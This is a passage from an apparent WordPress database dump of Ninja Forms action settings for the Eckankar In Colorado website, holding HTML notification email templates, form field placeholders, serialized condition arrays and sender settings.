/>\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello!</strong><strong> You have a new <span style=\"color: #23507d\">Colorado Springs Leadership Communications</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Colorado Springs ECK organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\n The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_33}Â {field:lastname_34}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_33}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_34}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_35}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_36}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_37}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_40}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_41}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello!</strong><strong> You have a new <span style=\"color: #23507d\">Colorado Springs Leadership Communications</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Colorado Springs ECK organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\n The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_33}Â {field:lastname_34}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_33}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_34}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_35}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_36}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_37}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_40}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_41}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(1256,48,'attach_csv','0','attach_csv','0'),(1257,48,'email_format','html','email_format','html'),(1258,48,'reply_to','','reply_to',''),(1259,48,'cc','','cc',''),(1260,48,'bcc','','bcc',''),(1261,48,'redirect_url','','redirect_url',''),(1262,48,'success_msg','','success_msg',''),(1263,48,'label','Admin Email','label','Admin Email'),(1264,48,'objectType','Action','objectType','Action'),(1265,48,'objectDomain','actions','objectDomain','actions'),(1266,48,'editActive','','editActive',''),(1267,48,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1268,48,'payment_gateways','','payment_gateways',''),(1269,48,'payment_total','0','payment_total','0'),(1270,48,'tag','','tag',''),(1271,48,'email_message_plain','','email_message_plain',''),(1272,48,'drawerDisabled','','drawerDisabled',''),(1273,48,'parent_id','12','parent_id','12'),(1274,49,'title','','title',''),(1275,49,'key','','key',''),(1276,49,'type','save','type','save'),(1277,49,'active','1','active','1'),(1278,49,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(1279,49,'label','Save Form','label','Save Form'),(1280,49,'parent_id','13','parent_id','13'),(1281,50,'title','','title',''),(1282,50,'key','','key',''),(1283,50,'type','email','type','email'),(1284,50,'active','0','active','0'),(1285,50,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(1286,50,'date_updated','2016-01-15','date_updated','2016-01-15'),(1287,50,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(1288,50,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(1289,50,'to','{field:email_270}','to','{field:email_270}'),(1290,50,'email_subject','Western Slope Leadership Communication','email_subject','Western Slope Leadership Communication'),(1291,50,'email_message','<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"bodyTable\"><br /><br />\r\n    <tr><br /><br />\r\n        <td align=\"center\" valign=\"top\"><br /><br />\r\n            <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"800\" id=\"emailContainer\"><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"left\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding-left:10px;color:#23507d;line-height: 80%\"><br /><br />\r\n                                    <h1>Eckankar In Colorado</h1> <br /><br />\r\n                                </td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                                <td></td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailBody\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\"><br /><br />\r\n                                   <p><strong>Hello {field:textbox_268},</strong><br /><br />\r\n                                  </p><br /><br />\r\n                                  <p>You have created a new form submission on the Eckankar In Colorado website.                                      Your submission is requesting contact with a person on the \"Western Slope Leadership Communication\" team.</p><br /><br />\r\n                              <p>Here is a copy of the information that you have submitted: </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                          <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding:10px;border: 1px solid #cccccc\"><br /><br />\r\n                                    <p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> [ninja_forms_field id=271]</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> [ninja_forms_field id=272]<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> [ninja_forms_field id=275]</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p><br /><br />\r\n                                </td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailFooter\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n                                  Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color:#23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n  <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><br /><br />\r\n                                </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                            <br /><br />\r\n                            <br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n            </table><br /><br />\r\n        </td><br /><br />\r\n    </tr><br /><br />\r\n</table><br /><br />\r\n','email_message','<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"bodyTable\"><br /><br />\r\n    <tr><br /><br />\r\n        <td align=\"center\" valign=\"top\"><br /><br />\r\n            <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"800\" id=\"emailContainer\"><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"left\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding-left:10px;color:#23507d;line-height: 80%\"><br /><br />\r\n                                    <h1>Eckankar In Colorado</h1> <br /><br />\r\n                                </td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                                <td></td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailBody\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\"><br /><br />\r\n                                   <p><strong>Hello {field:textbox_268},</strong><br /><br />\r\n                                  </p><br /><br />\r\n                                  <p>You have created a new form submission on the Eckankar In Colorado website.                                      Your submission is requesting contact with a person on the \"Western Slope Leadership Communication\" team.</p><br /><br />\r\n                              <p>Here is a copy of the information that you have submitted: </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                          <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding:10px;border: 1px solid #cccccc\"><br /><br />\r\n                                    <p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> [ninja_forms_field id=271]</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> [ninja_forms_field id=272]<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> [ninja_forms_field id=275]</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p><br /><br />\r\n                                </td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailFooter\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n                                  Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color:#23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n  <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><br /><br />\r\n                                </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                            <br /><br />\r\n                            <br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n            </table><br /><br />\r\n        </td><br /><br />\r\n    </tr><br /><br />\r\n</table><br /><br />\r\n'),(1292,50,'attach_csv','0','attach_csv','0'),(1293,50,'email_format','html','email_format','html'),(1294,50,'reply_to','','reply_to',''),(1295,50,'cc','','cc',''),(1296,50,'bcc','','bcc',''),(1297,50,'redirect_url','','redirect_url',''),(1298,50,'success_msg','','success_msg',''),(1299,50,'label','Send copy to user','label','Send copy to user'),(1300,50,'parent_id','13','parent_id','13'),(1301,51,'title','','title',''),(1302,51,'key','','key',''),(1303,51,'type','successmessage','type','successmessage'),(1304,51,'active','1','active','1'),(1305,51,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(1306,51,'date_updated','2016-01-15','date_updated','2016-01-15'),(1307,51,'from_name','','from_name',''),(1308,51,'from_address','','from_address',''),(1309,51,'to','{wp:admin_email}','to','{wp:admin_email}'),(1310,51,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(1311,51,'email_message','{fields_table}','email_message','{fields_table}'),(1312,51,'attach_csv','0','attach_csv','0'),(1313,51,'email_format','html','email_format','html'),(1314,51,'reply_to','','reply_to',''),(1315,51,'cc','','cc',''),(1316,51,'bcc','','bcc',''),(1317,51,'redirect_url','','redirect_url',''),(1318,51,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>'),(1319,51,'label','Success Message','label','Success Message'),(1320,51,'parent_id','13','parent_id','13'),(1321,52,'title','','title',''),(1322,52,'key','','key',''),(1323,52,'type','email','type','email'),(1324,52,'active','1','active','1'),(1325,52,'created_at','2018-01-03 11:45:44','created_at','2018-01-03 11:45:44'),(1326,52,'date_updated','2016-01-19','date_updated','2016-01-19'),(1327,52,'from_name','Eckankar In Colorado Contact Form','from_name','Eckankar In Colorado Contact Form'),(1328,52,'from_address','contact@eckankar-colorado.org','from_address','contact@eckankar-colorado.org'),(1329,52,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(1330,52,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(1331,52,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new \"Eckankar in Colorado Contact\" form submission.<br /><br /><br />\r\n</strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the contact to receive these messages.</p><br /><br />\r\n<p>The following person has requested contact. Here is the information that <strong><span style=\"color: #333333\">{field:textbox_268}</span></strong> has submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>MESSAGE SUBJECT:</strong> {field:textbox_303}</span><br /><br /><br />\r\n <br /><br /><br />\r\n<span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new \"Eckankar in Colorado Contact\" form submission.<br /><br /><br />\r\n</strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the contact to receive these messages.</p><br /><br />\r\n<p>The following person has requested contact. Here is the information that <strong><span style=\"color: #333333\">{field:textbox_268}</span></strong> has submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>MESSAGE SUBJECT:</strong> {field:textbox_303}</span><br /><br /><br />\r\n <br /><br /><br />\r\n<span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(1332,52,'attach_csv','0','attach_csv','0'),(1333,52,'email_format','html','email_format','html'),(1334,52,'reply_to','','reply_to',''),(1335,52,'cc','','cc',''),(1336,52,'bcc','','bcc',''),(1337,52,'redirect_url','','redirect_url',''),(1338,52,'success_msg','','success_msg',''),(1339,52,'label','Admin Email','label','Admin Email'),(1340,52,'parent_id','13','parent_id','13'),(1341,53,'title','','title',''),(1342,53,'key','','key',''),(1343,53,'type','save','type','save'),(1344,53,'active','1','active','1'),(1345,53,'created_at','2018-01-03 12:34:29','created_at','2018-01-03 12:34:29'),(1346,53,'label','Save Form','label','Save 